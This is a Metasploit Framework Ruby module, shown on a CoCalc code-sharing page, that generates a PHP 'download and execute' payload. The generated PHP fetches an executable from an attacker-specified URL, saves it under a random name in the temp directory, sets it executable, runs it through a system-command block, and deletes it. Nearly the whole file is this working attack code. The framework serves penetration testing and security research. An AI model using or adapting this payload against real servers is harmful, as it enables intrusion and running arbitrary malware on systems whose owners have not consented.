CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/payloads/singles/php/download_exec.rb
Views: 11765
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6


7
module MetasploitModule

8


9
  CachedSize = :dynamic

10


11
  include Msf::Payload::Php

12
  include Msf::Payload::Single

13


14
  def initialize(info = {})

15
    super(update_info(info,

16
      'Name'          => 'PHP Executable Download and Execute',

17
      'Description'   => 'Download an EXE from an HTTP URL and execute it',

18
      'Author'        => [ 'egypt' ],

19
      'License'       => BSD_LICENSE,

20
      'Platform'      => 'php',

21
      'Arch'          => ARCH_PHP,

22
      'Privileged'    => false

23
      ))

24


25
    # EXITFUNC is not supported :/

26
    deregister_options('EXITFUNC')

27


28
    # Register command execution options

29
    register_options(

30
      [

31
        OptString.new('URL', [ true, "The pre-encoded URL to the executable" ])

32
      ])

33
  end

34


35
  def php_exec_file

36
    exename = Rex::Text.rand_text_alpha(rand(8) + 4)

37
    dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)

38
    shell = <<-END_OF_PHP_CODE

39
    #{php_preamble(disabled_varname: dis)}

40
    if (!function_exists('sys_get_temp_dir')) {

41
      function sys_get_temp_dir() {

42
        if (!empty($_ENV['TMP'])) { return realpath($_ENV['TMP']); }

43
        if (!empty($_ENV['TMPDIR'])) { return realpath($_ENV['TMPDIR']); }

44
        if (!empty($_ENV['TEMP'])) { return realpath($_ENV['TEMP']); }

45
        $tempfile=tempnam(uniqid(rand(),TRUE),'');

46
        if (file_exists($tempfile)) {

47
          @unlink($tempfile);

48
          return realpath(dirname($tempfile));

49
        }

50
        return null;

51
      }

52
    }

53
    $fname = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "#{exename}.exe";

54
    $fd_in = fopen("#{datastore['URL']}", "rb");

55
    if ($fd_in === false) { die(); }

56
    $fd_out = fopen($fname, "wb");

57
    if ($fd_out === false) { die(); }

58
    while (!feof($fd_in)) {

59
      fwrite($fd_out, fread($fd_in, 8192));

60
    }

61
    fclose($fd_in);

62
    fclose($fd_out);

63
    chmod($fname, 0777);

64
    $c = $fname;

65
    #{php_system_block(cmd_varname: "$c", disabled_varnam: dis)}

66
    @unlink($fname);

67
    END_OF_PHP_CODE

68


69
    #return Rex::Text.compress(shell)

70
    return shell

71
  end

72


73
  #

74
  # Constructs the payload

75
  #

76
  def generate(_opts = {})

77
    return php_exec_file

78
  end

79
end

80


81